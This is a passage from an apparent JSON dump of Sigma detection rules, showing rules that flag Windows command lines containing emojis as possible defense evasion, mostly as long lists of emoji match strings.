'🙅🏾‍♀️'\n            - '🙅🏾'\n            - '🙅🏾‍♂️'\n            - '🙆🏾‍♀️'\n            - '🙆🏾'\n            - '🙆🏾‍♂️'\n            - '🙋🏾‍♀️'\n            - '🙋🏾'\n            - '🙋🏾‍♂️'\n            - '🧏🏾‍♀️'\n            - '🧏🏾'\n            - '🧏🏾‍♂️'\n            - '🤦🏾‍♀️'\n            - '🤦🏾'\n            - '🤦🏾‍♂️'\n            - '🤷🏾‍♀️'\n            - '🤷🏾'\n            - '🤷🏾‍♂️'\n            - '🙎🏾‍♀️'\n            - '🙎🏾'\n            - '🙎🏾‍♂️'\n            - '🙍🏾‍♀️'\n            - '🙍🏾'\n            - '🙍🏾‍♂️'\n            - '💇🏾‍♀️'\n            - '💇🏾'\n            - '💇🏾‍♂️'\n            - '💆🏾‍♀️'\n            - '💆🏾'\n            - '💆🏾‍♂️'\n            - '🧖🏾‍♀️'\n            - '🧖🏾'\n            - '🧖🏾‍♂️'\n            - '💃🏾'\n            - '🕺🏾'\n            - '👩🏾‍🦽'\n            - '🧑🏾‍🦽'\n            - '👨🏾‍🦽'\n            - '👩🏾‍🦼'\n            - '🧑🏾‍🦼'\n            - '👨🏾‍🦼'\n            - '🚶🏾‍♀️'\n            - '🚶🏾'\n            - '🚶🏾‍♂️'\n            - '👩🏾‍🦯'\n            - '🧑🏾‍🦯'\n            - '👨🏾‍🦯'\n            - '🧎🏾‍♀️'\n            - '🧎🏾'\n            - '🧎🏾‍♂️'\n            - '🏃🏾‍♀️'\n            - '🏃🏾'\n            - '🏃🏾‍♂️'\n            - '🧍🏾‍♀️'\n            - '🧍🏾'\n            - '🧍🏾‍♂️'\n            - '👭🏾'\n            - '🧑🏾‍🤝‍🧑🏾'\n            - '👬🏾'\n            - '👫🏾'\n            - '🧗🏾‍♀️'\n            - '🧗🏾'\n            - '🧗🏾‍♂️'\n            - '🏇🏾'\n            - '🏂🏾'\n            - '🏌🏾‍♀️'\n            - '🏌🏾'\n            - '🏌🏾‍♂️'\n            - '🏄🏾‍♀️'\n            - '🏄🏾'\n            - '🏄🏾‍♂️'\n            - '🚣🏾‍♀️'\n            - '🚣🏾'\n            - '🚣🏾‍♂️'\n            - '🏊🏾‍♀️'\n            - '🏊🏾'\n            - '🏊🏾‍♂️'\n            - '⛹🏾‍♀️'\n            - '⛹🏾'\n            - '⛹🏾‍♂️'\n            - '🏋🏾‍♀️'\n            - '🏋🏾'\n            - '🏋🏾‍♂️'\n            - '🚴🏾‍♀️'\n            - '🚴🏾'\n            - '🚴🏾‍♂️'\n            - '🚵🏾‍♀️'\n            - '🚵🏾'\n            - '🚵🏾‍♂️'\n            - '🤸🏾‍♀️'\n            - '🤸🏾'\n            - '🤸🏾‍♂️'\n            - '🤽🏾‍♀️'\n            - '🤽🏾'\n            - '🤽🏾‍♂️'\n            - '🤾🏾‍♀️'\n            - '🤾🏾'\n            - '🤾🏾‍♂️'\n            - '🤹🏾‍♀️'\n            - '🤹🏾'\n            - '🤹🏾‍♂️'\n            - '🧘🏾‍♀️'\n            - '🧘🏾'\n            - '🧘🏾‍♂️'\n            - '🛀🏾'\n            - '🛌🏾'\n            - '👋🏿'\n            - '🤚🏿'\n            - '🖐🏿'\n            - '✋🏿'\n            - '🖖🏿'\n            - '👌🏿'\n            - '🤌🏿'\n            - '🤏🏿'\n            - '✌🏿'\n            - '🤞🏿'\n            - '🫰🏿'\n            - '🤟🏿'\n            - '🤘🏿'\n            - '🤙🏿'\n            - '🫵🏿'\n            - '🫱🏿'\n            - '🫲🏿'\n            - '🫳🏿'\n            - '🫴🏿'\n            - '👈🏿'\n            - '👉🏿'\n            - '👆🏿'\n            - '🖕🏿'\n            - '👇🏿'\n            - '☝🏿'\n            - '👍🏿'\n            - '👎🏿'\n            - '✊🏿'\n            - '👊🏿'\n            - '🤛🏿'\n            - '🤜🏿'\n            - '👏🏿'\n            - '🫶🏿'\n            - '🙌🏿'\n            - '👐🏿'\n            - '🤲🏿'\n            - '🙏🏿'\n            - '✍🏿'\n            - '🤳🏿'\n            - '💪🏿'\n            - '🦵🏿'\n            - '🦶🏿'\n            - '👂🏿'\n            - '🦻🏿'\n            - '👃🏿'\n            - '👶🏿'\n            - '👧🏿'\n            - '🧒🏿'\n            - '👦🏿'\n            - '👩🏿'\n            - '🧑🏿'\n            - '👨🏿'\n            - '👩🏿‍🦱'\n            - '🧑🏿‍🦱'\n            - '👨🏿‍🦱'\n            - '👩🏿‍🦰'\n            - '🧑🏿‍🦰'\n            - '👨🏿‍🦰'\n            - '👱🏿‍♀️'\n            - '👱🏿'\n            - '👱🏿‍♂️'\n            - '👩🏿‍🦳'\n            - '🧑🏿‍🦳'\n            - '👨🏿‍🦳'\n            - '👩🏿‍🦲'\n            - '🧑🏿‍🦲'\n            - '👨🏿‍🦲'\n            - '🧔🏿‍♀️'\n            - '🧔🏿'\n            - '🧔🏿‍♂️'\n            - '👵🏿'\n            - '🧓🏿'\n            - '👴🏿'\n            - '👲🏿'\n            - '👳🏿‍♀️'\n            - '👳🏿'\n            - '👳🏿‍♂️'\n            - '🧕🏿'\n            - '👮🏿‍♀️'\n            - '👮🏿'\n            - '👮🏿‍♂️'\n            - '👷🏿‍♀️'\n            - '👷🏿'\n            - '👷🏿‍♂️'\n            - '💂🏿‍♀️'\n            - '💂🏿'\n            - '💂🏿‍♂️'\n            - '🕵🏿‍♀️'\n            - '🕵🏿'\n            - '🕵🏿‍♂️'\n            - '👩🏿‍⚕️'\n            - '🧑🏿‍⚕️'\n            - '👨🏿‍⚕️'\n            - '👩🏿‍🌾'\n            - '🧑🏿‍🌾'\n            - '👨🏿‍🌾'\n            - '👩🏿‍🍳'\n            - '🧑🏿‍🍳'\n            - '👨🏿‍🍳'\n            - '👩🏿‍🎓'\n            - '🧑🏿‍🎓'\n            - '👨🏿‍🎓'\n            - '👩🏿‍🎤'\n            - '🧑🏿‍🎤'\n            - '👨🏿‍🎤'\n            - '👩🏿‍🏫'\n            - '🧑🏿‍🏫'\n            - '👨🏿‍🏫'\n            - '👩🏿‍🏭'\n            - '🧑🏿‍🏭'\n            - '👨🏿‍🏭'\n            - '👩🏿‍💻'\n            - '🧑🏿‍💻'\n            - '👨🏿‍💻'\n            - '👩🏿‍💼'\n            - '🧑🏿‍💼'\n            - '👨🏿‍💼'\n            - '👩🏿‍🔧'\n            - '🧑🏿‍🔧'\n            - '👨🏿‍🔧'\n            - '👩🏿‍🔬'\n            - '🧑🏿‍🔬'\n            - '👨🏿‍🔬'\n            - '👩🏿‍🎨'\n            - '🧑🏿‍🎨'\n            - '👨🏿‍🎨'\n            - '👩🏿‍🚒'\n            - '🧑🏿‍🚒'\n            - '👨🏿‍🚒'\n            - '👩🏿‍✈️'\n            - '🧑🏿‍✈️'\n            - '👨🏿‍✈️'\n            - '👩🏿‍🚀'\n            - '🧑🏿‍🚀'\n            - '👨🏿‍🚀'\n            - '👩🏿‍⚖️'\n            - '🧑🏿‍⚖️'\n            - '👨🏿‍⚖️'\n            - '👰🏿‍♀️'\n            - '👰🏿'\n            - '👰🏿‍♂️'\n            - '🤵🏿‍♀️'\n            - '🤵🏿'\n            - '🤵🏿‍♂️'\n            - '👸🏿'\n            - '🫅🏿'\n            - '🤴🏿'\n            - '🥷🏿'\n            - '🦸🏿‍♀️'\n            - '🦸🏿'\n            - '🦸🏿‍♂️'\n            - '🦹🏿‍♀️'\n            - '🦹🏿'\n            - '🦹🏿‍♂️'\n            - '🤶🏿'\n            - '🧑🏿‍🎄'\n            - '🎅🏿'\n            - '🧙🏿‍♀️'\n            - '🧙🏿'\n            - '🧙🏿‍♂️'\n            - '🧝🏿‍♀️'\n            - '🧝🏿'\n            - '🧝🏿‍♂️'\n            - '🧛🏿‍♀️'\n            - '🧛🏿'\n            - '🧛🏿‍♂️'\n            - '🧜🏿‍♀️'\n            - '🧜🏿'\n            - '🧜🏿‍♂️'\n            - '🧚🏿‍♀️'\n            - '🧚🏿'\n            - '🧚🏿‍♂️'\n            - '👼🏿'\n            - '🤰🏿'\n            - '🫄🏿'\n            - '🫃🏿'\n            - '🤱🏿'\n            - '👩🏿‍🍼'\n            - '🧑🏿‍🍼'\n            - '👨🏿‍🍼'\n            - '🙇🏿‍♀️'\n            - '🙇🏿'\n            - '🙇🏿‍♂️'\n            - '💁🏿‍♀️'\n            - '💁🏿'\n            - '💁🏿‍♂️'\n            - '🙅🏿‍♀️'\n            - '🙅🏿'\n            - '🙅🏿‍♂️'\n            - '🙆🏿‍♀️'\n            - '🙆🏿'\n            - '🙆🏿‍♂️'\n            - '🙋🏿‍♀️'\n            - '🙋🏿'\n            - '🙋🏿‍♂️'\n            - '🧏🏿‍♀️'\n            - '🧏🏿'\n            - '🧏🏿‍♂️'\n            - '🤦🏿‍♀️'\n            - '🤦🏿'\n            - '🤦🏿‍♂️'\n            - '🤷🏿‍♀️'\n            - '🤷🏿'\n            - '🤷🏿‍♂️'\n            - '🙎🏿‍♀️'\n            - '🙎🏿'\n            - '🙎🏿‍♂️'\n            - '🙍🏿‍♀️'\n            - '🙍🏿'\n            - '🙍🏿‍♂️'\n            - '💇🏿‍♀️'\n            - '💇🏿'\n            - '💇🏿‍♂️'\n            - '💆🏿‍♀️'\n            - '💆🏿'\n            - '💆🏿‍♂️'\n            - '🧖🏿‍♀️'\n            - '🧖🏿'\n            - '🧖🏿‍♂️'\n            - '💃🏿'\n            - '🕺🏿'\n            - '🕴🏿'\n            - '👩🏿‍🦽'\n            - '🧑🏿‍🦽'\n            - '👨🏿‍🦽'\n            - '👩🏿‍🦼'\n            - '🧑🏿‍🦼'\n            - '👨🏿‍🦼'\n            - '🚶🏿‍♀️'\n            - '🚶🏿'\n            - '🚶🏿‍♂️'\n            - '👩🏿‍🦯'\n            - '🧑🏿‍🦯'\n            - '👨🏿‍🦯'\n            - '🧎🏿‍♀️'\n            - '🧎🏿'\n            - '🧎🏿‍♂️'\n            - '🏃🏿‍♀️'\n            - '🏃🏿'\n            - '🏃🏿‍♂️'\n            - '🧍🏿‍♀️'\n            - '🧍🏿'\n            - '🧍🏿‍♂️'\n            - '👭🏿'\n            - '🧑🏿‍🤝‍🧑🏿'\n            - '👬🏿'\n            - '👫🏿'\n            - '🧗🏿‍♀️'\n            - '🧗🏿'\n            - '🧗🏿‍♂️'\n            - '🏇🏿'\n            - '🏂🏿'\n            - '🏌🏿‍♀️'\n            - '🏌🏿'\n            - '🏌🏿‍♂️'\n            - '🏄🏿‍♀️'\n            - '🏄🏿'\n            - '🏄🏿‍♂️'\n            - '🚣🏿‍♀️'\n            - '🚣🏿'\n            - '🚣🏿‍♂️'\n            - '🏊🏿‍♀️'\n            - '🏊🏿'\n            - '🏊🏿‍♂️'\n            - '⛹🏿‍♀️'\n            - '⛹🏿'\n            - '⛹🏿‍♂️'\n            - '🏋🏿‍♀️'\n            - '🏋🏿'\n            - '🏋🏿‍♂️'\n            - '🚴🏿‍♀️'\n            - '🚴🏿'\n            - '🚴🏿‍♂️'\n            - '🚵🏿‍♀️'\n            - '🚵🏿'\n            - '🚵🏿‍♂️'\n            - '🤸🏿‍♀️'\n            - '🤸🏿'\n            - '🤸🏿‍♂️'\n            - '🤽🏿‍♀️'\n            - '🤽🏿'\n            - '🤽🏿‍♂️'\n            - '🤾🏿‍♀️'\n            - '🤾🏿'\n            - '🤾🏿‍♂️'\n            - '🤹🏿‍♀️'\n            - '🤹🏿'\n            - '🤹🏿‍♂️'\n            - '🧘🏿‍♀️'\n            - '🧘🏿'\n            - '🧘🏿‍♂️'\n            - '🛀🏿'\n            - '🛌🏿'\n            - '🐶'\n            - '🐱'\n            - '🐭'\n            - '🐹'\n            - '🐰'\n            - '🦊'\n            - '🐻'\n            - '🐼'\n            - '🐻‍❄️'\n            - '🐨'\n            - '🐯'\n            - '🦁'\n            - '🐮'\n            - '🐷'\n            - '🐽'\n            - '🐸'\n            - '🐵'\n            - '🙈'\n            - '🙉'\n            - '🙊'\n            - '🐒'\n            - '🐔'\n            - '🐧'\n            - '🐦'\n            - '🐤'\n            - '🐣'\n            - '🐥'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_3.yml",
    "content": "title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3\nid: f9578658-9e71-4711-b634-3f9b50cd3c06\nstatus: test\ndescription: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.\nauthor: '@Kostastsale, TheDFIRReport'\nreferences:\n    - Internal Research\ntags:\n    - attack.defense-evasion\ndate: 2022-12-05\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '🦆'\n            - '🦅'\n            - '🦉'\n            - '🦇'\n            - '🐺'\n            - '🐗'\n            - '🐴'\n            - '🦄'\n            - '🐝'\n            - '🪱'\n            - '🐛'\n            - '🦋'\n            - '🐌'\n            - '🐞'\n            - '🐜'\n            - '🪰'\n            - '🪲'\n            - '🪳'\n            - '🦟'\n            - '🦗'\n            - '🕷'\n            - '🕸'\n            - '🦂'\n            - '🐢'\n            - '🐍'\n            - '🦎'\n            - '🦖'\n            - '🦕'\n            - '🐙'\n            - '🦑'\n            - '🦐'\n            - '🦞'\n            - '🦀'\n            - '🪸'\n            - '🐡'\n            - '🐠'\n            - '🐟'\n            - '🐬'\n            - '🐳'\n            - '🐋'\n            - '🦈'\n            - '🐊'\n            - '🐅'\n            - '🐆'\n            - '🦓'\n            - '🦍'\n            - '🦧'\n            - '🦣'\n            - '🐘'\n            - '🦛'\n            - '🦏'\n            - '🐪'\n            - '🐫'\n            - '🦒'\n            - '🦘'\n            - '🦬'\n            - '🐃'\n            - '🐂'\n            - '🐄'\n            - '🐎'\n            - '🐖'\n            - '🐏'\n            - '🐑'\n            - '🦙'\n            - '🐐'\n            - '🦌'\n            - '🐕'\n            - '🐩'\n            - '🦮'\n            - '🐕‍🦺'\n            - '🐈'\n            - '🐈‍⬛'\n            - '🪶'\n            - '🐓'\n            - '🦃'\n            - '🦤'\n            - '🦚'\n            - '🦜'\n            - '🦢'\n            - '🦩'\n            - '🕊'\n            - '🐇'\n            - '🦝'\n            - '🦨'\n            - '🦡'\n            - '🦫'\n            - '🦦'\n            - '🦥'\n            - '🐁'\n            - '🐀'\n            - '🐿'\n            - '🦔'\n            - '🐾'\n            - '🐉'\n            - '🐲'\n            - '🌵'\n            - '🎄'\n            - '🌲'\n            - '🌳'\n            - '🌴'\n            - '🪹'\n            - '🪺'\n            - '🪵'\n            - '🌱'\n            - '🌿'\n            - '☘️'\n            - '🍀'\n            - '🎍'\n            - '🪴'\n            - '🎋'\n            - '🍃'\n            - '🍂'\n            - '🍁'\n            - '🍄'\n            - '🐚'\n            - '🪨'\n            - '🌾'\n            - '💐'\n            - '🌷'\n            - '🪷'\n            - '🌹'\n            - '🥀'\n            - '🌺'\n            - '🌸'\n            - '🌼'\n            - '🌻'\n            - '🌞'\n            - '🌝'\n            - '🌛'\n            - '🌜'\n            - '🌚'\n            - '🌕'\n            - '🌖'\n            - '🌗'\n            - '🌘'\n            - '🌑'\n            - '🌒'\n            - '🌓'\n            - '🌔'\n            - '🌙'\n            - '🌎'\n            - '🌍'\n            - '🌏'\n            - '🪐'\n            - '💫'\n            - '⭐️'\n            - '🌟'\n            - '✨'\n            - '⚡️'\n            - '☄️'\n            - '💥'\n            - '🔥'\n            - '🌪'\n            - '🌈'\n            - '☀️'\n            - '🌤'\n            - '⛅️'\n            - '🌥'\n            - '☁️'\n            - '🌦'\n            - '🌧'\n            - '⛈'\n            - '🌩'\n            - '🌨'\n            - '❄️'\n            - '☃️'\n            - '⛄️'\n            - '🌬'\n            - '💨'\n            - '💧'\n            - '💦'\n            - '🫧'\n            - '☔️'\n            - '☂️'\n            - '🌊'\n            - '🌫🍏'\n            - '🍎'\n            - '🍐'\n            - '🍊'\n            - '🍋'\n            - '🍌'\n            - '🍉'\n            - '🍇'\n            - '🍓'\n            - '🫐'\n            - '🍈'\n            - '🍒'\n            - '🍑'\n            - '🥭'\n            - '🍍'\n            - '🥥'\n            - '🥝'\n            - '🍅'\n            - '🍆'\n            - '🥑'\n            - '🥦'\n            - '🥬'\n            - '🥒'\n            - '🌶'\n            - '🫑'\n            - '🌽'\n            - '🥕'\n            - '🫒'\n            - '🧄'\n            - '🧅'\n            - '🥔'\n            - '🍠'\n            - '🫘'\n            - '🥐'\n            - '🥯'\n            - '🍞'\n            - '🥖'\n            - '🥨'\n            - '🧀'\n            - '🥚'\n            - '🍳'\n            - '🧈'\n            - '🥞'\n            - '🧇'\n            - '🥓'\n            - '🥩'\n            - '🍗'\n            - '🍖'\n            - '🦴'\n            - '🌭'\n            - '🍔'\n            - '🍟'\n            - '🍕'\n            - '🫓'\n            - '🥪'\n            - '🥙'\n            - '🧆'\n            - '🌮'\n            - '🌯'\n            - '🫔'\n            - '🥗'\n            - '🥘'\n            - '🫕'\n            - '🥫'\n            - '🍝'\n            - '🍜'\n            - '🍲'\n            - '🍛'\n            - '🍣'\n            - '🍱'\n            - '🥟'\n            - '🦪'\n            - '🍤'\n            - '🍙'\n            - '🍚'\n            - '🍘'\n            - '🍥'\n            - '🥠'\n            - '🥮'\n            - '🍢'\n            - '🍡'\n            - '🍧'\n            - '🍨'\n            - '🍦'\n            - '🥧'\n            - '🧁'\n            - '🍰'\n            - '🎂'\n            - '🍮'\n            - '🍭'\n            - '🍬'\n            - '🍫'\n            - '🍿'\n            - '🍩'\n            - '🍪'\n            - '🌰'\n            - '🥜'\n            - '🍯'\n            - '🥛'\n            - '🍼'\n            - '🫖'\n            - '☕️'\n            - '🍵'\n            - '🧃'\n            - '🥤'\n            - '🧋'\n            - '🫙'\n            - '🍶'\n            - '🍺'\n            - '🍻'\n            - '🥂'\n            - '🍷'\n            - '🫗'\n            - '🥃'\n            - '🍸'\n            - '🍹'\n            - '🧉'\n            - '🍾'\n            - '🧊'\n            - '🥄'\n            - '🍴'\n            - '🍽'\n            - '🥣'\n            - '🥡'\n            - '🥢'\n            - '🧂'\n            - '⚽️'\n            - '🏀'\n            - '🏈'\n            - '⚾️'\n            - '🥎'\n            - '🎾'\n            - '🏐'\n            - '🏉'\n            - '🥏'\n            - '🎱'\n            - '🪀'\n            - '🏓'\n            - '🏸'\n            - '🏒'\n            - '🏑'\n            - '🥍'\n            - '🏏'\n            - '🪃'\n            - '🥅'\n            - '⛳️'\n            - '🪁'\n            - '🏹'\n            - '🎣'\n            - '🤿'\n            - '🥊'\n            - '🥋'\n            - '🎽'\n            - '🛹'\n            - '🛼'\n            - '🛷'\n            - '⛸'\n            - '🥌'\n            - '🎿'\n            - '⛷'\n            - '🏂'\n            - '🪂'\n            - '🏋️‍♀️'\n            - '🏋️'\n            - '🏋️‍♂️'\n            - '🤼‍♀️'\n            - '🤼'\n            - '🤼‍♂️'\n            - '🤸‍♀️'\n            - '🤸'\n            - '🤸‍♂️'\n            - '⛹️‍♀️'\n            - '⛹️'\n            - '⛹️‍♂️'\n            - '🤺'\n            - '🤾‍♀️'\n            - '🤾'\n            - '🤾‍♂️'\n            - '🏌️‍♀️'\n            - '🏌️'\n            - '🏌️‍♂️'\n            - '🏇'\n            - '🧘‍♀️'\n            - '🧘'\n            - '🧘‍♂️'\n            - '🏄‍♀️'\n            - '🏄'\n            - '🏄‍♂️'\n            - '🏊‍♀️'\n            - '🏊'\n            - '🏊‍♂️'\n            - '🤽‍♀️'\n            - '🤽'\n            - '🤽‍♂️'\n            - '🚣‍♀️'\n            - '🚣'\n            - '🚣‍♂️'\n            - '🧗‍♀️'\n            - '🧗'\n            - '🧗‍♂️'\n            - '🚵‍♀️'\n            - '🚵'\n            - '🚵‍♂️'\n            - '🚴‍♀️'\n            - '🚴'\n            - '🚴‍♂️'\n            - '🏆'\n            - '🥇'\n            - '🥈'\n            - '🥉'\n            - '🏅'\n            - '🎖'\n            - '🏵'\n            - '🎗'\n            - '🎫'\n            - '🎟'\n            - '🎪'\n            - '🤹'\n            - '🤹‍♂️'\n            - '🤹‍♀️'\n            - '🎭'\n            - '🩰'\n            - '🎨'\n            - '🎬'\n            - '🎤'\n            - '🎧'\n            - '🎼'\n            - '🎹'\n            - '🥁'\n            - '🪘'\n            - '🎷'\n            - '🎺'\n            - '🪗'\n            - '🎸'\n            - '🪕'\n            - '🎻'\n            - '🎲'\n            - '♟'\n            - '🎯'\n            - '🎳'\n            - '🎮'\n            - '🎰'\n            - '🧩'\n            - '🚗'\n            - '🚕'\n            - '🚙'\n            - '🚌'\n            - '🚎'\n            - '🏎'\n            - '🚓'\n            - '🚑'\n            - '🚒'\n            - '🚐'\n            - '🛻'\n            - '🚚'\n            - '🚛'\n            - '🚜'\n            - '🦯'\n            - '🦽'\n            - '🦼'\n            - '🛴'\n            - '🚲'\n            - '🛵'\n            - '🏍'\n            - '🛺'\n            - '🚨'\n            - '🚔'\n            - '🚍'\n            - '🚘'\n            - '🚖'\n            - '🛞'\n            - '🚡'\n            - '🚠'\n            - '🚟'\n            - '🚃'\n            - '🚋'\n            - '🚞'\n            - '🚝'\n            - '🚄'\n            - '🚅'\n            - '🚈'\n            - '🚂'\n            - '🚆'\n            - '🚇'\n            - '🚊'\n            - '🚉'\n            - '✈️'\n            - '🛫'\n            - '🛬'\n            - '🛩'\n            - '💺'\n            - '🛰'\n            - '🚀'\n            - '🛸'\n            - '🚁'\n            - '🛶'\n            - '⛵️'\n            - '🚤'\n            - '🛥'\n            - '🛳'\n            - '⛴'\n            - '🚢'\n            - '⚓️'\n            - '🛟'\n            - '🪝'\n            - '⛽️'\n            - '🚧'\n            - '🚦'\n            - '🚥'\n            - '🚏'\n            - '🗺'\n            - '🗿'\n            - '🗽'\n            - '🗼'\n            - '🏰'\n            - '🏯'\n            - '🏟'\n            - '🎡'\n            - '🎢'\n            - '🛝'\n            - '🎠'\n            - '⛲️'\n            - '⛱'\n            - '🏖'\n            - '🏝'\n            - '🏜'\n            - '🌋'\n            - '⛰'\n            - '🏔'\n            - '🗻'\n            - '🏕'\n            - '⛺️'\n            - '🛖'\n            - '🏠'\n            - '🏡'\n            - '🏘'\n            - '🏚'\n            - '🏗'\n            - '🏭'\n            - '🏢'\n            - '🏬'\n            - '🏣'\n            - '🏤'\n            - '🏥'\n            - '🏦'\n            - '🏨'\n            - '🏪'\n            - '🏫'\n            - '🏩'\n            - '💒'\n            - '🏛'\n            - '⛪️'\n            - '🕌'\n            - '🕍'\n            - '🛕'\n            - '🕋'\n            - '⛩'\n            - '🛤'\n            - '🛣'\n            - '🗾'\n            - '🎑'\n            - '🏞'\n            - '🌅'\n            - '🌄'\n            - '🌠'\n            - '🎇'\n            - '🎆'\n            - '🌇'\n            - '🌆'\n            - '🏙'\n            - '🌃'\n            - '🌌'\n            - '🌉'\n            - '🌁'\n            - '⌚️'\n            - '📱'\n            - '📲'\n            - '💻'\n            - '⌨️'\n            - '🖥'\n            - '🖨'\n            - '🖱'\n            - '🖲'\n            - '🕹'\n            - '🗜'\n            - '💽'\n            - '💾'\n            - '💿'\n            - '📀'\n            - '📼'\n            - '📷'\n            - '📸'\n            - '📹'\n            - '🎥'\n            - '📽'\n            - '🎞'\n            - '📞'\n            - '☎️'\n            - '📟'\n            - '📠'\n            - '📺'\n            - '📻'\n            - '🎙'\n            - '🎚'\n            - '🎛'\n            - '🧭'\n            - '⏱'\n            - '⏲'\n            - '⏰'\n            - '🕰'\n            - '⌛️'\n            - '⏳'\n            - '📡'\n            - '🔋'\n            - '🪫'\n            - '🔌'\n            - '💡'\n            - '🔦'\n            - '🕯'\n            - '🪔'\n            - '🧯'\n            - '🛢'\n            - '💸'\n            - '💵'\n            - '💴'\n            - '💶'\n            - '💷'\n            - '🪙'\n            - '💰'\n            - '💳'\n            - '💎'\n            - '⚖️'\n            - '🪜'\n            - '🧰'\n            - '🪛'\n            - '🔧'\n            - '🔨'\n            - '⚒'\n            - '🛠'\n            - '⛏'\n            - '🪚'\n            - '🔩'\n            - '⚙️'\n            - '🪤'\n            - '🧱'\n            - '⛓'\n            - '🧲'\n            - '🔫'\n            - '💣'\n            - '🧨'\n            - '🪓'\n            - '🔪'\n            - '🗡'\n            - '⚔️'\n            - '🛡'\n            - '🚬'\n            - '⚰️'\n            - '🪦'\n            - '⚱️'\n            - '🏺'\n            - '🔮'\n            - '📿'\n            - '🧿'\n            - '🪬'\n            - '💈'\n            - '⚗️'\n            - '🔭'\n            - '🔬'\n            - '🕳'\n            - '🩹'\n            - '🩺'\n            - '🩻'\n            - '🩼'\n            - '💊'\n            - '💉'\n            - '🩸'\n            - '🧬'\n            - '🦠'\n            - '🧫'\n            - '🧪'\n            - '🌡'\n            - '🧹'\n            - '🪠'\n            - '🧺'\n            - '🧻'\n            - '🚽'\n            - '🚰'\n            - '🚿'\n            - '🛁'\n            - '🛀'\n            - '🧼'\n            - '🪥'\n            - '🪒'\n            - '🧽'\n            - '🪣'\n            - '🧴'\n            - '🛎'\n            - '🔑'\n            - '🗝'\n            - '🚪'\n            - '🪑'\n            - '🛋'\n            - '🛏'\n            - '🛌'\n            - '🧸'\n            - '🪆'\n            - '🖼'\n            - '🪞'\n            - '🪟'\n            - '🛍'\n            - '🛒'\n            - '🎁'\n            - '🎈'\n            - '🎏'\n            - '🎀'\n            - '🪄'\n            - '🪅'\n            - '🎊'\n            - '🎉'\n            - '🪩'\n            - '🎎'\n            - '🏮'\n            - '🎐'\n            - '🧧'\n            - '✉️'\n            - '📩'\n            - '📨'\n            - '📧'\n            - '💌'\n            - '📥'\n            - '📤'\n            - '📦'\n            - '🏷'\n            - '🪧'\n            - '📪'\n            - '📫'\n            - '📬'\n            - '📭'\n            - '📮'\n            - '📯'\n            - '📜'\n            - '📃'\n            - '📄'\n            - '📑'\n            - '🧾'\n            - '📊'\n            - '📈'\n            - '📉'\n            - '🗒'\n            - '🗓'\n            - '📆'\n            - '📅'\n            - '🗑'\n            - '🪪'\n            - '📇'\n            - '🗃'\n            - '🗳'\n            - '🗄'\n            - '📋'\n            - '📁'\n            - '📂'\n            - '🗂'\n            - '🗞'\n            - '📰'\n            - '📓'\n            - '📔'\n            - '📒'\n            - '📕'\n            - '📗'\n            - '📘'\n            - '📙'\n            - '📚'\n            - '📖'\n            - '🔖'\n            - '🧷'\n            - '🔗'\n            - '📎'\n            - '🖇'\n            - '📐'\n            - '📏'\n            - '🧮'\n            - '📌'\n            - '📍'\n            - '✂️'\n            - '🖊'\n            - '🖋'\n            - '✒️'\n            - '🖌'\n            - '🖍'\n            - '📝'\n            - '✏️'\n            - '🔍'\n            - '🔎'\n            - '🔏'\n            - '🔐'\n            - '🔒'\n            - '🔓❤️'\n            - '🧡'\n            - '💛'\n            - '💚'\n            - '💙'\n            - '💜'\n            - '🖤'\n            - '🤍'\n            - '🤎'\n            - '❤️‍🔥'\n            - '❤️‍🩹'\n            - '💔'\n            - '❣️'\n            - '💕'\n            - '💞'\n            - '💓'\n            - '💗'\n            - '💖'\n            - '💘'\n            - '💝'\n            - '💟'\n            - '☮️'\n            - '✝️'\n            - '☪️'\n            - '🕉'\n            - '☸️'\n            - '✡️'\n            - '🔯'\n            - '🕎'\n            - '☯️'\n            - '☦️'\n            - '🛐'\n            - '⛎'\n            - '♈️'\n            - '♉️'\n            - '♊️'\n            - '♋️'\n            - '♌️'\n            - '♍️'\n            - '♎️'\n            - '♏️'\n            - '♐️'\n            - '♑️'\n            - '♒️'\n            - '♓️'\n            - '🆔'\n            - '⚛️'\n            - '🉑'\n            - '☢️'\n            - '☣️'\n            - '📴'\n            - '📳'\n            - '🈶'\n            - '🈚️'\n            - '🈸'\n            - '🈺'\n            - '🈷️'\n            - '✴️'\n            - '🆚'\n            - '💮'\n            - '🉐'\n            - '㊙️'\n            - '㊗️'\n            - '🈴'\n            - '🈵'\n            - '🈹'\n            - '🈲'\n            - '🅰️'\n            - '🅱️'\n            - '🆎'\n            - '🆑'\n            - '🅾️'\n            - '🆘'\n            - '❌'\n            - '⭕️'\n            - '🛑'\n            - '⛔️'\n            - '📛'\n            - '🚫'\n            - '💯'\n            - '💢'\n            - '♨️'\n            - '🚷'\n            - '🚯'\n            - '🚳'\n            - '🚱'\n            - '🔞'\n            - '📵'\n            - '🚭'\n            - '❗️'\n            - '❕'\n            - '❓'\n            - '❔'\n            - '‼️'\n            - '⁉️'\n            - '🔅'\n            - '🔆'\n            - '〽️'\n            - '⚠️'\n            - '🚸'\n            - '🔱'\n            - '⚜️'\n            - '🔰'\n            - '♻️'\n            - '✅'\n            - '🈯️'\n            - '💹'\n            - '❇️'\n            - '✳️'\n            - '❎'\n            - '🌐'\n            - '💠'\n            - 'Ⓜ️'\n            - '🌀'\n            - '💤'\n            - '🏧'\n            - '🚾'\n            - '♿️'\n            - '🅿️'\n            - '🛗'\n            - '🈳'\n            - '🈂️'\n            - '🛂'\n            - '🛃'\n            - '🛄'\n            - '🛅'\n            - '🚹'\n            - '🚺'\n            - '🚼'\n            - '⚧'\n            - '🚻'\n            - '🚮'\n            - '🎦'\n            - '📶'\n            - '🈁'\n            - '🔣'\n            - 'ℹ️'\n            - '🔤'\n            - '🔡'\n            - '🔠'\n            - '🆖'\n            - '🆗'\n            - '🆙'\n            - '🆒'\n            - '🆕'\n            - '🆓'\n            - '0️⃣'\n            - '1️⃣'\n            - '2️⃣'\n            - '3️⃣'\n            - '4️⃣'\n            - '5️⃣'\n            - '6️⃣'\n            - '7️⃣'\n            - '8️⃣'\n            - '9️⃣'\n            - '🔟'\n            - '🔢'\n            - '#️⃣'\n            - '*️⃣'\n            - '⏏️'\n            - '▶️'\n            - '⏸'\n            - '⏯'\n            - '⏹'\n            - '⏺'\n            - 